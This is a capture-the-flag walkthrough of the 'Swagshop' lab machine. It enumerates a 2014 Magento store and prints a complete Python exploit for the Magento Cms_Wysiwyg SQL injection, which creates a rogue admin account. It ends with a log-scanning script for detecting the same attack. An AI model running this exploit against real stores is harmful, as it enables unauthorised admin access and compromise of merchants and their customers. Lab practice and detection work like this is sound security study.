10.10.10.140 - Swagshop
Run an Nmap scan against the 10.10.10.140 host, specifying -sV for service version detection:
By cross-referencing the detected service versions with the Ubuntu Launchpad package repository, we learn that the host is running Ubuntu Server 16.04 (Xenial):
Apache 2.4.18 is also present, indicating a web application running on port 80. DirBuster was used to map the directory structure:
The CMS providing the "user experience" is based on Magento from 2014:
One of the configuration files was exposed on port 80, revealing the root password:
http://10.10.10.140/app/etc/local.xml
Magento Connect Manager is present at http://10.10.10.140/downloader, revealing version 1.9.0:
Vulnerability research:
```python
# Python 2 script (print statements, str-based base64) as posted in the write-up.
import requests
import base64
import sys

target = sys.argv[1]

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/index.php/admin/Cms_Wysiwyg/directive/index/"

# For demo purposes, I use the same attack as is being used in the wild
SQLQUERY="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO `admin_user` (`firstname`, `lastname`,`email`,`username`,`password`,`created`,`lognum`,`reload_acl_flag`,`is_active`,`extra`,`rp_token`,`rp_token_created_at`) VALUES ('Firstname','Lastname','[email protected]','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO `admin_role` (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""

# Put the nice readable queries into one line,
# and insert the username:password combination
query = SQLQUERY.replace("\n", "").format(username="ypwq", password="123")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is {{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url,
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds ypwq:123".format(target)
else:
    print "DID NOT WORK"
```
Successful login to an administration panel:
The newly created credentials were valid for Magento Connect Manager as well:
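From the defender's side, the three things this walkthrough relied on (an exposed app/etc/local.xml, a reachable /downloader Connect Manager, and POSTs to the Cms_Wysiwyg directive endpoint) all leave traces in the Apache access log. The Python 3 script below is an added example, not part of the original write-up; the log lines and the 10.10.14.x client addresses are constructed samples.

```python
import re

# Constructed sample Apache combined-log lines (not taken from the box).
SAMPLE_LOG = """\
10.10.14.5 - - [10/May/2019:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.10.14.5 - - [10/May/2019:12:00:07 +0000] "GET /app/etc/local.xml HTTP/1.1" 200 2271 "-" "Mozilla/5.0"
10.10.14.5 - - [10/May/2019:12:00:09 +0000] "GET /downloader/ HTTP/1.1" 200 3310 "-" "Mozilla/5.0"
10.10.14.5 - - [10/May/2019:12:00:15 +0000] "POST /index.php/admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 200 812 "-" "python-requests/2.21.0"
10.10.14.9 - - [10/May/2019:12:01:00 +0000] "GET /skin/frontend/base/default/css/styles.css HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
"""

# Minimal parser for the combined log format: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators taken from the write-up above. Each rule gets (method, path) and
# returns True when the request matches.
RULES = [
    ("exposed-config", lambda m, p: m == "GET" and p.startswith("/app/etc/local.xml")),
    ("connect-manager", lambda m, p: p.startswith("/downloader")),
    ("cms-wysiwyg-directive", lambda m, p: m == "POST" and "/admin/cms_wysiwyg/directive" in p),
]

def scan_log(text):
    """Return (rule, client_ip, timestamp, status) for every matching request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined log format
        path = m.group("path").split("?", 1)[0].lower()  # drop query string, normalise case
        for name, pred in RULES:
            if pred(m.group("method"), path):
                findings.append((name, m.group("ip"), m.group("ts"), m.group("status")))
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%-22s %-12s %s status=%s" % f)
```

A 200 on /app/etc/local.xml is the finding that matters most: it means the web server is serving the configuration file, and the database credentials in it should be treated as compromised.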
WIP